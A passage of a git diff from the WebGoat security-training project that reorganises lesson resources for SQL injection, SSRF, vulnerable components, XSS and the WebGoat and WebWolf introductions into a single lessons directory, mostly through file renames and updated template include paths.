         <div class="assignment-success"><i class="fa fa-2 fa-check hidden" aria-hidden="true"></i></div>
         <form class="attack-form" accept-charset="UNKNOWN"
@@ -90,7 +90,7 @@
 </div>
 
 <div class="lesson-page-wrapper">
-    <div class="adoc-content" th:replace="doc:SqlInjection_content12b.adoc"></div>
+    <div class="adoc-content" th:replace="doc:lessons/sql_injection/documentation/SqlInjection_content12b.adoc"></div>
     <div class="attack-container">
         <div class="assignment-success"><i class="fa fa-2 fa-check hidden" aria-hidden="true"></i></div>
         <form class="attack-form" accept-charset="UNKNOWN"
@@ -114,11 +114,11 @@
 
 
 <div class="lesson-page-wrapper">
-    <div class="adoc-content" th:replace="doc:SqlInjection_content13.adoc"></div>
+    <div class="adoc-content" th:replace="doc:lessons/sql_injection/documentation/SqlInjection_content13.adoc"></div>
 </div>
 
 <div class="lesson-page-wrapper">
-    <div class="adoc-content" th:replace="doc:SqlInjection_order_by.adoc"></div>
+    <div class="adoc-content" th:replace="doc:lessons/sql_injection/documentation/SqlInjection_order_by.adoc"></div>
     <script th:src="@{/lesson_js/assignment13.js}" language="JavaScript"></script>
     <div class="attack-container">
         <div class="assignment-success"><i class="fa fa-2 fa-check hidden" aria-hidden="true"></i></div>
@@ -191,7 +191,7 @@
 </div>
 
 <div class="lesson-page-wrapper">
-    <div class="adoc-content" th:replace="doc:SqlInjection_content14.adoc"></div>
+    <div class="adoc-content" th:replace="doc:lessons/sql_injection/documentation/SqlInjection_content14.adoc"></div>
 </div>
 
 </html>
diff --git a/webgoat-lessons/sql-injection/src/main/resources/i18n/WebGoatLabels.properties b/src/main/resources/lessons/sql_injection/i18n/WebGoatLabels.properties
similarity index 100%
rename from webgoat-lessons/sql-injection/src/main/resources/i18n/WebGoatLabels.properties
rename to src/main/resources/lessons/sql_injection/i18n/WebGoatLabels.properties
diff --git a/webgoat-lessons/cross-site-scripting/src/main/resources/i18n/WebGoatLabels_de.properties b/src/main/resources/lessons/sql_injection/i18n/WebGoatLabels_de.properties
similarity index 100%
rename from webgoat-lessons/cross-site-scripting/src/main/resources/i18n/WebGoatLabels_de.properties
rename to src/main/resources/lessons/sql_injection/i18n/WebGoatLabels_de.properties
diff --git a/webgoat-lessons/cross-site-scripting/src/main/resources/i18n/WebGoatLabels_fr.properties b/src/main/resources/lessons/sql_injection/i18n/WebGoatLabels_fr.properties
similarity index 100%
rename from webgoat-lessons/cross-site-scripting/src/main/resources/i18n/WebGoatLabels_fr.properties
rename to src/main/resources/lessons/sql_injection/i18n/WebGoatLabels_fr.properties
diff --git a/webgoat-lessons/cross-site-scripting/src/main/resources/i18n/WebGoatLabels_ru.properties b/src/main/resources/lessons/sql_injection/i18n/WebGoatLabels_ru.properties
similarity index 100%
rename from webgoat-lessons/cross-site-scripting/src/main/resources/i18n/WebGoatLabels_ru.properties
rename to src/main/resources/lessons/sql_injection/i18n/WebGoatLabels_ru.properties
diff --git a/webgoat-lessons/sql-injection/src/main/resources/js/assignment10b.js b/src/main/resources/lessons/sql_injection/js/assignment10b.js
similarity index 100%
rename from webgoat-lessons/sql-injection/src/main/resources/js/assignment10b.js
rename to src/main/resources/lessons/sql_injection/js/assignment10b.js
diff --git a/webgoat-lessons/sql-injection/src/main/resources/js/assignment13.js b/src/main/resources/lessons/sql_injection/js/assignment13.js
similarity index 100%
rename from webgoat-lessons/sql-injection/src/main/resources/js/assignment13.js
rename to src/main/resources/lessons/sql_injection/js/assignment13.js
diff --git a/webgoat-lessons/sql-injection/src/main/resources/js/challenge.js b/src/main/resources/lessons/sql_injection/js/challenge.js
similarity index 100%
rename from webgoat-lessons/sql-injection/src/main/resources/js/challenge.js
rename to src/main/resources/lessons/sql_injection/js/challenge.js
diff --git a/webgoat-lessons/sql-injection/src/main/resources/js/questions_sql_injection.json b/src/main/resources/lessons/sql_injection/js/questions_sql_injection.json
similarity index 100%
rename from webgoat-lessons/sql-injection/src/main/resources/js/questions_sql_injection.json
rename to src/main/resources/lessons/sql_injection/js/questions_sql_injection.json
diff --git a/webgoat-lessons/ssrf/src/main/resources/lessonPlans/en/SSRF_Intro.adoc b/src/main/resources/lessons/ssrf/documentation/SSRF_Intro.adoc
similarity index 100%
rename from webgoat-lessons/ssrf/src/main/resources/lessonPlans/en/SSRF_Intro.adoc
rename to src/main/resources/lessons/ssrf/documentation/SSRF_Intro.adoc
diff --git a/webgoat-lessons/ssrf/src/main/resources/lessonPlans/en/SSRF_Prevent.adoc b/src/main/resources/lessons/ssrf/documentation/SSRF_Prevent.adoc
similarity index 100%
rename from webgoat-lessons/ssrf/src/main/resources/lessonPlans/en/SSRF_Prevent.adoc
rename to src/main/resources/lessons/ssrf/documentation/SSRF_Prevent.adoc
diff --git a/webgoat-lessons/ssrf/src/main/resources/lessonPlans/en/SSRF_Task1.adoc b/src/main/resources/lessons/ssrf/documentation/SSRF_Task1.adoc
similarity index 100%
rename from webgoat-lessons/ssrf/src/main/resources/lessonPlans/en/SSRF_Task1.adoc
rename to src/main/resources/lessons/ssrf/documentation/SSRF_Task1.adoc
diff --git a/webgoat-lessons/ssrf/src/main/resources/lessonPlans/en/SSRF_Task2.adoc b/src/main/resources/lessons/ssrf/documentation/SSRF_Task2.adoc
similarity index 100%
rename from webgoat-lessons/ssrf/src/main/resources/lessonPlans/en/SSRF_Task2.adoc
rename to src/main/resources/lessons/ssrf/documentation/SSRF_Task2.adoc
diff --git a/webgoat-lessons/ssrf/src/main/resources/html/SSRF.html b/src/main/resources/lessons/ssrf/html/SSRF.html
similarity index 82%
rename from webgoat-lessons/ssrf/src/main/resources/html/SSRF.html
rename to src/main/resources/lessons/ssrf/html/SSRF.html
index c04edf620..39d6927c6 100755
--- a/webgoat-lessons/ssrf/src/main/resources/html/SSRF.html
+++ b/src/main/resources/lessons/ssrf/html/SSRF.html
@@ -3,11 +3,11 @@
 <html xmlns:th="http://www.thymeleaf.org">
 
     <div class="lesson-page-wrapper">
-        <div class="adoc-content" th:replace="doc:SSRF_Intro.adoc"></div>
+        <div class="adoc-content" th:replace="doc:lessons/ssrf/documentation/SSRF_Intro.adoc"></div>
     </div>
 
     <div class="lesson-page-wrapper">
-        <div class="adoc-content" th:replace="doc:SSRF_Task1.adoc"></div>
+        <div class="adoc-content" th:replace="doc:lessons/ssrf/documentation/SSRF_Task1.adoc"></div>
         <div class="attack-container">
             <div class="assignment-success"><i class="fa fa-2 fa-check hidden" aria-hidden="true"></i></div>
             <form class="attack-form" accept-charset="UNKNOWN"
@@ -29,7 +29,7 @@
     </div>
 
     <div class="lesson-page-wrapper">
-        <div class="adoc-content" th:replace="doc:SSRF_Task2.adoc"></div>
+        <div class="adoc-content" th:replace="doc:lessons/ssrf/documentation/SSRF_Task2.adoc"></div>
         <div class="attack-container">
             <div class="assignment-success"><i class="fa fa-2 fa-check hidden" aria-hidden="true"></i></div>
             <form class="attack-form" accept-charset="UNKNOWN"
@@ -51,6 +51,6 @@
     </div>
 
     <div class="lesson-page-wrapper">
-        <div class="adoc-content" th:replace="doc:SSRF_Prevent.adoc"></div>
+        <div class="adoc-content" th:replace="doc:lessons/ssrf/documentation/SSRF_Prevent.adoc"></div>
     </div>
 </html>
diff --git a/webgoat-lessons/ssrf/src/main/resources/i18n/WebGoatLabels.properties b/src/main/resources/lessons/ssrf/i18n/WebGoatLabels.properties
similarity index 100%
rename from webgoat-lessons/ssrf/src/main/resources/i18n/WebGoatLabels.properties
rename to src/main/resources/lessons/ssrf/i18n/WebGoatLabels.properties
diff --git a/webgoat-lessons/ssrf/src/main/resources/images/cat.jpg b/src/main/resources/lessons/ssrf/images/cat.jpg
similarity index 100%
rename from webgoat-lessons/ssrf/src/main/resources/images/cat.jpg
rename to src/main/resources/lessons/ssrf/images/cat.jpg
diff --git a/webgoat-lessons/ssrf/src/main/resources/images/jerry.png b/src/main/resources/lessons/ssrf/images/jerry.png
similarity index 100%
rename from webgoat-lessons/ssrf/src/main/resources/images/jerry.png
rename to src/main/resources/lessons/ssrf/images/jerry.png
diff --git a/webgoat-lessons/ssrf/src/main/resources/images/tom.png b/src/main/resources/lessons/ssrf/images/tom.png
similarity index 100%
rename from webgoat-lessons/ssrf/src/main/resources/images/tom.png
rename to src/main/resources/lessons/ssrf/images/tom.png
diff --git a/webgoat-lessons/ssrf/src/main/resources/js/credentials.js b/src/main/resources/lessons/ssrf/js/credentials.js
similarity index 100%
rename from webgoat-lessons/ssrf/src/main/resources/js/credentials.js
rename to src/main/resources/lessons/ssrf/js/credentials.js
diff --git a/webgoat-lessons/vulnerable-components/src/main/resources/lessonPlans/en/VulnerableComponents_content0.adoc b/src/main/resources/lessons/vulnerable_components/documentation/VulnerableComponents_content0.adoc
similarity index 100%
rename from webgoat-lessons/vulnerable-components/src/main/resources/lessonPlans/en/VulnerableComponents_content0.adoc
rename to src/main/resources/lessons/vulnerable_components/documentation/VulnerableComponents_content0.adoc
diff --git a/webgoat-lessons/vulnerable-components/src/main/resources/lessonPlans/en/VulnerableComponents_content1.adoc b/src/main/resources/lessons/vulnerable_components/documentation/VulnerableComponents_content1.adoc
similarity index 100%
rename from webgoat-lessons/vulnerable-components/src/main/resources/lessonPlans/en/VulnerableComponents_content1.adoc
rename to src/main/resources/lessons/vulnerable_components/documentation/VulnerableComponents_content1.adoc
diff --git a/webgoat-lessons/vulnerable-components/src/main/resources/lessonPlans/en/VulnerableComponents_content1a.adoc b/src/main/resources/lessons/vulnerable_components/documentation/VulnerableComponents_content1a.adoc
similarity index 100%
rename from webgoat-lessons/vulnerable-components/src/main/resources/lessonPlans/en/VulnerableComponents_content1a.adoc
rename to src/main/resources/lessons/vulnerable_components/documentation/VulnerableComponents_content1a.adoc
diff --git a/webgoat-lessons/vulnerable-components/src/main/resources/lessonPlans/en/VulnerableComponents_content2.adoc b/src/main/resources/lessons/vulnerable_components/documentation/VulnerableComponents_content2.adoc
similarity index 100%
rename from webgoat-lessons/vulnerable-components/src/main/resources/lessonPlans/en/VulnerableComponents_content2.adoc
rename to src/main/resources/lessons/vulnerable_components/documentation/VulnerableComponents_content2.adoc
diff --git a/webgoat-lessons/vulnerable-components/src/main/resources/lessonPlans/en/VulnerableComponents_content2a.adoc b/src/main/resources/lessons/vulnerable_components/documentation/VulnerableComponents_content2a.adoc
similarity index 100%
rename from webgoat-lessons/vulnerable-components/src/main/resources/lessonPlans/en/VulnerableComponents_content2a.adoc
rename to src/main/resources/lessons/vulnerable_components/documentation/VulnerableComponents_content2a.adoc
diff --git a/webgoat-lessons/vulnerable-components/src/main/resources/lessonPlans/en/VulnerableComponents_content3.adoc b/src/main/resources/lessons/vulnerable_components/documentation/VulnerableComponents_content3.adoc
similarity index 100%
rename from webgoat-lessons/vulnerable-components/src/main/resources/lessonPlans/en/VulnerableComponents_content3.adoc
rename to src/main/resources/lessons/vulnerable_components/documentation/VulnerableComponents_content3.adoc
diff --git a/webgoat-lessons/vulnerable-components/src/main/resources/lessonPlans/en/VulnerableComponents_content4.adoc b/src/main/resources/lessons/vulnerable_components/documentation/VulnerableComponents_content4.adoc
similarity index 100%
rename from webgoat-lessons/vulnerable-components/src/main/resources/lessonPlans/en/VulnerableComponents_content4.adoc
rename to src/main/resources/lessons/vulnerable_components/documentation/VulnerableComponents_content4.adoc
diff --git a/webgoat-lessons/vulnerable-components/src/main/resources/lessonPlans/en/VulnerableComponents_content4a.adoc b/src/main/resources/lessons/vulnerable_components/documentation/VulnerableComponents_content4a.adoc
similarity index 100%
rename from webgoat-lessons/vulnerable-components/src/main/resources/lessonPlans/en/VulnerableComponents_content4a.adoc
rename to src/main/resources/lessons/vulnerable_components/documentation/VulnerableComponents_content4a.adoc
diff --git a/webgoat-lessons/vulnerable-components/src/main/resources/lessonPlans/en/VulnerableComponents_content4b.adoc b/src/main/resources/lessons/vulnerable_components/documentation/VulnerableComponents_content4b.adoc
similarity index 100%
rename from webgoat-lessons/vulnerable-components/src/main/resources/lessonPlans/en/VulnerableComponents_content4b.adoc
rename to src/main/resources/lessons/vulnerable_components/documentation/VulnerableComponents_content4b.adoc
diff --git a/webgoat-lessons/vulnerable-components/src/main/resources/lessonPlans/en/VulnerableComponents_content4c.adoc b/src/main/resources/lessons/vulnerable_components/documentation/VulnerableComponents_content4c.adoc
similarity index 100%
rename from webgoat-lessons/vulnerable-components/src/main/resources/lessonPlans/en/VulnerableComponents_content4c.adoc
rename to src/main/resources/lessons/vulnerable_components/documentation/VulnerableComponents_content4c.adoc
diff --git a/webgoat-lessons/vulnerable-components/src/main/resources/lessonPlans/en/VulnerableComponents_content5.adoc b/src/main/resources/lessons/vulnerable_components/documentation/VulnerableComponents_content5.adoc
similarity index 100%
rename from webgoat-lessons/vulnerable-components/src/main/resources/lessonPlans/en/VulnerableComponents_content5.adoc
rename to src/main/resources/lessons/vulnerable_components/documentation/VulnerableComponents_content5.adoc
diff --git a/webgoat-lessons/vulnerable-components/src/main/resources/lessonPlans/en/VulnerableComponents_content5a.adoc b/src/main/resources/lessons/vulnerable_components/documentation/VulnerableComponents_content5a.adoc
similarity index 100%
rename from webgoat-lessons/vulnerable-components/src/main/resources/lessonPlans/en/VulnerableComponents_content5a.adoc
rename to src/main/resources/lessons/vulnerable_components/documentation/VulnerableComponents_content5a.adoc
diff --git a/webgoat-lessons/vulnerable-components/src/main/resources/lessonPlans/en/VulnerableComponents_content6.adoc b/src/main/resources/lessons/vulnerable_components/documentation/VulnerableComponents_content6.adoc
similarity index 100%
rename from webgoat-lessons/vulnerable-components/src/main/resources/lessonPlans/en/VulnerableComponents_content6.adoc
rename to src/main/resources/lessons/vulnerable_components/documentation/VulnerableComponents_content6.adoc
diff --git a/webgoat-lessons/vulnerable-components/src/main/resources/lessonPlans/en/VulnerableComponents_plan.adoc b/src/main/resources/lessons/vulnerable_components/documentation/VulnerableComponents_plan.adoc
similarity index 100%
rename from webgoat-lessons/vulnerable-components/src/main/resources/lessonPlans/en/VulnerableComponents_plan.adoc
rename to src/main/resources/lessons/vulnerable_components/documentation/VulnerableComponents_plan.adoc
diff --git a/webgoat-lessons/vulnerable-components/src/main/resources/html/VulnerableComponents.html b/src/main/resources/lessons/vulnerable_components/html/VulnerableComponents.html
similarity index 68%
rename from webgoat-lessons/vulnerable-components/src/main/resources/html/VulnerableComponents.html
rename to src/main/resources/lessons/vulnerable_components/html/VulnerableComponents.html
index a71d4b805..dd123bf09 100644
--- a/webgoat-lessons/vulnerable-components/src/main/resources/html/VulnerableComponents.html
+++ b/src/main/resources/lessons/vulnerable_components/html/VulnerableComponents.html
@@ -4,20 +4,20 @@
 
     <link rel="stylesheet" type="text/css" href="http://code.jquery.com/ui/1.9.1/themes/base/jquery-ui.css" />
 	<div class="lesson-page-wrapper">
-        <div class="adoc-content" th:replace="doc:VulnerableComponents_plan.adoc"></div>
+        <div class="adoc-content" th:replace="doc:lessons/vulnerable_components/documentation/VulnerableComponents_plan.adoc"></div>
 	</div>
 	<div class="lesson-page-wrapper">
-        <div class="adoc-content" th:replace="doc:VulnerableComponents_content0.adoc"></div>
+        <div class="adoc-content" th:replace="doc:lessons/vulnerable_components/documentation/VulnerableComponents_content0.adoc"></div>
 	</div>
 	<div class="lesson-page-wrapper">
-        <div class="adoc-content" th:replace="doc:VulnerableComponents_content1.adoc"></div>
+        <div class="adoc-content" th:replace="doc:lessons/vulnerable_components/documentation/VulnerableComponents_content1.adoc"></div>
 	</div>
 	<div class="lesson-page-wrapper">
-        <div class="adoc-content" th:replace="doc:VulnerableComponents_content1a.adoc"></div>
+        <div class="adoc-content" th:replace="doc:lessons/vulnerable_components/documentation/VulnerableComponents_content1a.adoc"></div>
 	</div>
 
 	<div class="lesson-page-wrapper">
-        <div class="adoc-content" th:replace="doc:VulnerableComponents_content2.adoc"></div>
+        <div class="adoc-content" th:replace="doc:lessons/vulnerable_components/documentation/VulnerableComponents_content2.adoc"></div>
 		<div class="attack-container">
 			<!-- using attack-form class on your form, will allow your request to be ajaxified and stay within the display framework for webgoat -->
 			<div id="lessonContent">
@@ -45,7 +45,7 @@
 			</div>
 
 		</div>
-		<div class="adoc-content" th:replace="doc:VulnerableComponents_content2a.adoc"></div>
+		<div class="adoc-content" th:replace="doc:lessons/vulnerable_components/documentation/VulnerableComponents_content2a.adoc"></div>
 		<div class="attack-container">
 			<!-- using attack-form class on your form, will allow your request to be ajaxified and stay within the display framework for webgoat -->
 			<div id="lessonContent">
@@ -75,26 +75,26 @@
 		</div>
 	</div>
 	<div class="lesson-page-wrapper">
-        <div class="adoc-content" th:replace="doc:VulnerableComponents_content3.adoc"></div>
+        <div class="adoc-content" th:replace="doc:lessons/vulnerable_components/documentation/VulnerableComponents_content3.adoc"></div>
 	</div>
 	<div class="lesson-page-wrapper">
-        <div class="adoc-content" th:replace="doc:VulnerableComponents_content4.adoc"></div>
+        <div class="adoc-content" th:replace="doc:lessons/vulnerable_components/documentation/VulnerableComponents_content4.adoc"></div>
 	</div>
 	<div class="lesson-page-wrapper">
-        <div class="adoc-content" th:replace="doc:VulnerableComponents_content4a.adoc"></div>
+        <div class="adoc-content" th:replace="doc:lessons/vulnerable_components/documentation/VulnerableComponents_content4a.adoc"></div>
 	</div>
 	<div class="lesson-page-wrapper">
-        <div class="adoc-content" th:replace="doc:VulnerableComponents_content4b.adoc"></div>
+        <div class="adoc-content" th:replace="doc:lessons/vulnerable_components/documentation/VulnerableComponents_content4b.adoc"></div>
 	</div>
 	<div class="lesson-page-wrapper">
-        <div class="adoc-content" th:replace="doc:VulnerableComponents_content4c.adoc"></div>
+        <div class="adoc-content" th:replace="doc:lessons/vulnerable_components/documentation/VulnerableComponents_content4c.adoc"></div>
 	</div>
 	<div class="lesson-page-wrapper">
-        <div class="adoc-content" th:replace="doc:VulnerableComponents_content5.adoc"></div>
+        <div class="adoc-content" th:replace="doc:lessons/vulnerable_components/documentation/VulnerableComponents_content5.adoc"></div>
 	</div>
 	
 	<div class="lesson-page-wrapper">
-        <div class="adoc-content" th:replace="doc:VulnerableComponents_content5a.adoc"></div>
+        <div class="adoc-content" th:replace="doc:lessons/vulnerable_components/documentation/VulnerableComponents_content5a.adoc"></div>
 		<div class="attack-container">
 			<div class="assignment-success"><i class="fa fa-2 fa-check hidden" aria-hidden="true"></i></div>
 			<form class="attack-form" accept-charset="UNKNOWN"
@@ -120,7 +120,7 @@
 		</div>
 	</div>
 	<div class="lesson-page-wrapper">
-        <div class="adoc-content" th:replace="doc:VulnerableComponents_content6.adoc"></div>
+        <div class="adoc-content" th:replace="doc:lessons/vulnerable_components/documentation/VulnerableComponents_content6.adoc"></div>
 	</div>
 	
-</html>
\ No newline at end of file
+</html>
diff --git a/webgoat-lessons/vulnerable-components/src/main/resources/i18n/WebGoatLabels.properties b/src/main/resources/lessons/vulnerable_components/i18n/WebGoatLabels.properties
similarity index 100%
rename from webgoat-lessons/vulnerable-components/src/main/resources/i18n/WebGoatLabels.properties
rename to src/main/resources/lessons/vulnerable_components/i18n/WebGoatLabels.properties
diff --git a/webgoat-lessons/vulnerable-components/src/main/resources/images/OWASP-2013-A9.png b/src/main/resources/lessons/vulnerable_components/images/OWASP-2013-A9.png
similarity index 100%
rename from webgoat-lessons/vulnerable-components/src/main/resources/images/OWASP-2013-A9.png
rename to src/main/resources/lessons/vulnerable_components/images/OWASP-2013-A9.png
diff --git a/webgoat-lessons/vulnerable-components/src/main/resources/images/OWASP-Dep-Check.png b/src/main/resources/lessons/vulnerable_components/images/OWASP-Dep-Check.png
similarity index 100%
rename from webgoat-lessons/vulnerable-components/src/main/resources/images/OWASP-Dep-Check.png
rename to src/main/resources/lessons/vulnerable_components/images/OWASP-Dep-Check.png
diff --git a/webgoat-lessons/vulnerable-components/src/main/resources/images/Old-Components.png b/src/main/resources/lessons/vulnerable_components/images/Old-Components.png
similarity index 100%
rename from webgoat-lessons/vulnerable-components/src/main/resources/images/Old-Components.png
rename to src/main/resources/lessons/vulnerable_components/images/Old-Components.png
diff --git a/webgoat-lessons/vulnerable-components/src/main/resources/images/OpenSourceGrowing.png b/src/main/resources/lessons/vulnerable_components/images/OpenSourceGrowing.png
similarity index 100%
rename from webgoat-lessons/vulnerable-components/src/main/resources/images/OpenSourceGrowing.png
rename to src/main/resources/lessons/vulnerable_components/images/OpenSourceGrowing.png
diff --git a/webgoat-lessons/vulnerable-components/src/main/resources/images/Risk-of-Old-Components.png b/src/main/resources/lessons/vulnerable_components/images/Risk-of-Old-Components.png
similarity index 100%
rename from webgoat-lessons/vulnerable-components/src/main/resources/images/Risk-of-Old-Components.png
rename to src/main/resources/lessons/vulnerable_components/images/Risk-of-Old-Components.png
diff --git a/webgoat-lessons/vulnerable-components/src/main/resources/images/WebGoat-Vulns.png b/src/main/resources/lessons/vulnerable_components/images/WebGoat-Vulns.png
similarity index 100%
rename from webgoat-lessons/vulnerable-components/src/main/resources/images/WebGoat-Vulns.png
rename to src/main/resources/lessons/vulnerable_components/images/WebGoat-Vulns.png
diff --git a/webgoat-lessons/webgoat-introduction/src/main/resources/lessonPlans/en/Introduction.adoc b/src/main/resources/lessons/webgoat_introduction/documentation/Introduction.adoc
similarity index 100%
rename from webgoat-lessons/webgoat-introduction/src/main/resources/lessonPlans/en/Introduction.adoc
rename to src/main/resources/lessons/webgoat_introduction/documentation/Introduction.adoc
diff --git a/src/main/resources/lessons/webgoat_introduction/html/WebGoatIntroduction.html b/src/main/resources/lessons/webgoat_introduction/html/WebGoatIntroduction.html
new file mode 100644
index 000000000..be5b50d67
--- /dev/null
+++ b/src/main/resources/lessons/webgoat_introduction/html/WebGoatIntroduction.html
@@ -0,0 +1,8 @@
+<!DOCTYPE html>
+<html xmlns:th="http://www.thymeleaf.org">
+
+<div class="lesson-page-wrapper">
+    <div class="adoc-content" th:replace="doc:lessons/webgoat_introduction/documentation/Introduction.adoc"></div>
+</div>
+
+</html>
diff --git a/webgoat-lessons/webgoat-introduction/src/main/resources/i18n/WebGoatLabels.properties b/src/main/resources/lessons/webgoat_introduction/i18n/WebGoatLabels.properties
similarity index 100%
rename from webgoat-lessons/webgoat-introduction/src/main/resources/i18n/WebGoatLabels.properties
rename to src/main/resources/lessons/webgoat_introduction/i18n/WebGoatLabels.properties
diff --git a/webgoat-lessons/webgoat-introduction/src/main/resources/images/wg_logo.png b/src/main/resources/lessons/webgoat_introduction/images/wg_logo.png
similarity index 100%
rename from webgoat-lessons/webgoat-introduction/src/main/resources/images/wg_logo.png
rename to src/main/resources/lessons/webgoat_introduction/images/wg_logo.png
diff --git a/webgoat-lessons/webwolf-introduction/src/main/resources/lessonPlans/en/IntroductionWebWolf.adoc b/src/main/resources/lessons/webwolf_introduction/documentation/IntroductionWebWolf.adoc
similarity index 100%
rename from webgoat-lessons/webwolf-introduction/src/main/resources/lessonPlans/en/IntroductionWebWolf.adoc
rename to src/main/resources/lessons/webwolf_introduction/documentation/IntroductionWebWolf.adoc
diff --git a/webgoat-lessons/webwolf-introduction/src/main/resources/lessonPlans/en/Landing_page.adoc b/src/main/resources/lessons/webwolf_introduction/documentation/Landing_page.adoc
similarity index 100%
rename from webgoat-lessons/webwolf-introduction/src/main/resources/lessonPlans/en/Landing_page.adoc
rename to src/main/resources/lessons/webwolf_introduction/documentation/Landing_page.adoc
diff --git a/webgoat-lessons/webwolf-introduction/src/main/resources/lessonPlans/en/Receiving_mail.adoc b/src/main/resources/lessons/webwolf_introduction/documentation/Receiving_mail.adoc
similarity index 100%
rename from webgoat-lessons/webwolf-introduction/src/main/resources/lessonPlans/en/Receiving_mail.adoc
rename to src/main/resources/lessons/webwolf_introduction/documentation/Receiving_mail.adoc
diff --git a/webgoat-lessons/webwolf-introduction/src/main/resources/lessonPlans/en/Uploading_files.adoc b/src/main/resources/lessons/webwolf_introduction/documentation/Uploading_files.adoc
similarity index 100%
rename from webgoat-lessons/webwolf-introduction/src/main/resources/lessonPlans/en/Uploading_files.adoc
rename to src/main/resources/lessons/webwolf_introduction/documentation/Uploading_files.adoc
diff --git a/webgoat-lessons/webwolf-introduction/src/main/resources/html/WebWolfIntroduction.html b/src/main/resources/lessons/webwolf_introduction/html/WebWolfIntroduction.html
similarity index 88%
rename from webgoat-lessons/webwolf-introduction/src/main/resources/html/WebWolfIntroduction.html
rename to src/main/resources/lessons/webwolf_introduction/html/WebWolfIntroduction.html
index 7ce1511de..1986fd263 100644
--- a/webgoat-lessons/webwolf-introduction/src/main/resources/html/WebWolfIntroduction.html
+++ b/src/main/resources/lessons/webwolf_introduction/html/WebWolfIntroduction.html
@@ -2,15 +2,15 @@
 <html xmlns:th="http://www.thymeleaf.org">
 
 <div class="lesson-page-wrapper">
-    <div class="adoc-content" th:replace="doc:IntroductionWebWolf.adoc"></div>
+    <div class="adoc-content" th:replace="doc:lessons/webwolf_introduction/documentation/IntroductionWebWolf.adoc"></div>
 </div>
 
 <div class="lesson-page-wrapper">
-    <div class="adoc-content" th:replace="doc:Uploading_files.adoc"></div>
+    <div class="adoc-content" th:replace="doc:lessons/webwolf_introduction/documentation/Uploading_files.adoc"></div>
 </div>
 
 <div class="lesson-page-wrapper">
-    <div class="adoc-content" th:replace="doc:Receiving_mail.adoc"></div>
+    <div class="adoc-content" th:replace="doc:lessons/webwolf_introduction/documentation/Receiving_mail.adoc"></div>
     <div class="attack-container">
         <img th:src="@{/images/wolf-enabled.png}" class="webwolf-enabled"/>
         <div class="assignment-success"><i class="fa fa-2 fa-check hidden" aria-hidden="true"></i></div>
@@ -66,7 +66,7 @@
 </div>
 
 <div class="lesson-page-wrapper">
-    <div class="adoc-content" th:replace="doc:Landing_page.adoc"></div>
+    <div class="adoc-content" th:replace="doc:lessons/webwolf_introduction/documentation/Landing_page.adoc"></div>
     <div class="attack-container">
         <img th:src="@{/images/wolf-enabled.png}" class="webwolf-enabled"/>
         <div class="assignment-success"><i class="fa fa-2 fa-check hidden" aria-hidden="true"></i></div>
diff --git a/webgoat-lessons/webwolf-introduction/src/main/resources/i18n/WebGoatLabels.properties b/src/main/resources/lessons/webwolf_introduction/i18n/WebGoatLabels.properties
similarity index 100%
rename from webgoat-lessons/webwolf-introduction/src/main/resources/i18n/WebGoatLabels.properties
rename to src/main/resources/lessons/webwolf_introduction/i18n/WebGoatLabels.properties
diff --git a/webgoat-lessons/webwolf-introduction/src/main/resources/images/files.png b/src/main/resources/lessons/webwolf_introduction/images/files.png
similarity index 100%
rename from webgoat-lessons/webwolf-introduction/src/main/resources/images/files.png
rename to src/main/resources/lessons/webwolf_introduction/images/files.png
diff --git a/webgoat-lessons/webwolf-introduction/src/main/resources/images/mailbox.png b/src/main/resources/lessons/webwolf_introduction/images/mailbox.png
similarity index 100%
rename from webgoat-lessons/webwolf-introduction/src/main/resources/images/mailbox.png
rename to src/main/resources/lessons/webwolf_introduction/images/mailbox.png
diff --git a/webgoat-lessons/webwolf-introduction/src/main/resources/images/requests.png b/src/main/resources/lessons/webwolf_introduction/images/requests.png
similarity index 100%
rename from webgoat-lessons/webwolf-introduction/src/main/resources/images/requests.png
rename to src/main/resources/lessons/webwolf_introduction/images/requests.png
diff --git a/webgoat-lessons/webwolf-introduction/src/main/resources/images/wolf-enabled.png b/src/main/resources/lessons/webwolf_introduction/images/wolf-enabled.png
similarity index 100%
rename from webgoat-lessons/webwolf-introduction/src/main/resources/images/wolf-enabled.png
rename to src/main/resources/lessons/webwolf_introduction/images/wolf-enabled.png
diff --git a/webgoat-lessons/webwolf-introduction/src/main/resources/templates/webwolfPasswordReset.html b/src/main/resources/lessons/webwolf_introduction/templates/webwolfPasswordReset.html
similarity index 100%
rename from webgoat-lessons/webwolf-introduction/src/main/resources/templates/webwolfPasswordReset.html
rename to src/main/resources/lessons/webwolf_introduction/templates/webwolfPasswordReset.html
diff --git a/webgoat-lessons/cross-site-scripting/src/main/resources/css/stored-xss.css b/src/main/resources/lessons/xss/css/stored-xss.css
similarity index 100%
rename from webgoat-lessons/cross-site-scripting/src/main/resources/css/stored-xss.css
rename to src/main/resources/lessons/xss/css/stored-xss.css
diff --git a/webgoat-lessons/cross-site-scripting/src/main/resources/lessonPlans/en/CrossSiteScriptingMitigation_plan.adoc b/src/main/resources/lessons/xss/documentation/CrossSiteScriptingMitigation_plan.adoc
similarity index 100%
rename from webgoat-lessons/cross-site-scripting/src/main/resources/lessonPlans/en/CrossSiteScriptingMitigation_plan.adoc
rename to src/main/resources/lessons/xss/documentation/CrossSiteScriptingMitigation_plan.adoc
diff --git a/webgoat-lessons/cross-site-scripting/src/main/resources/lessonPlans/en/CrossSiteScriptingStored_plan.adoc b/src/main/resources/lessons/xss/documentation/CrossSiteScriptingStored_plan.adoc
similarity index 100%
rename from webgoat-lessons/cross-site-scripting/src/main/resources/lessonPlans/en/CrossSiteScriptingStored_plan.adoc
rename to src/main/resources/lessons/xss/documentation/CrossSiteScriptingStored_plan.adoc
diff --git a/webgoat-lessons/cross-site-scripting/src/main/resources/lessonPlans/en/CrossSiteScripting_content1.adoc b/src/main/resources/lessons/xss/documentation/CrossSiteScripting_content1.adoc
similarity index 100%
rename from webgoat-lessons/cross-site-scripting/src/main/resources/lessonPlans/en/CrossSiteScripting_content1.adoc
rename to src/main/resources/lessons/xss/documentation/CrossSiteScripting_content1.adoc
diff --git a/webgoat-lessons/cross-site-scripting/src/main/resources/lessonPlans/en/CrossSiteScripting_content2.adoc b/src/main/resources/lessons/xss/documentation/CrossSiteScripting_content2.adoc
similarity index 100%
rename from webgoat-lessons/cross-site-scripting/src/main/resources/lessonPlans/en/CrossSiteScripting_content2.adoc
rename to src/main/resources/lessons/xss/documentation/CrossSiteScripting_content2.adoc
diff --git a/webgoat-lessons/cross-site-scripting/src/main/resources/lessonPlans/en/CrossSiteScripting_content3.adoc b/src/main/resources/lessons/xss/documentation/CrossSiteScripting_content3.adoc
similarity index 100%
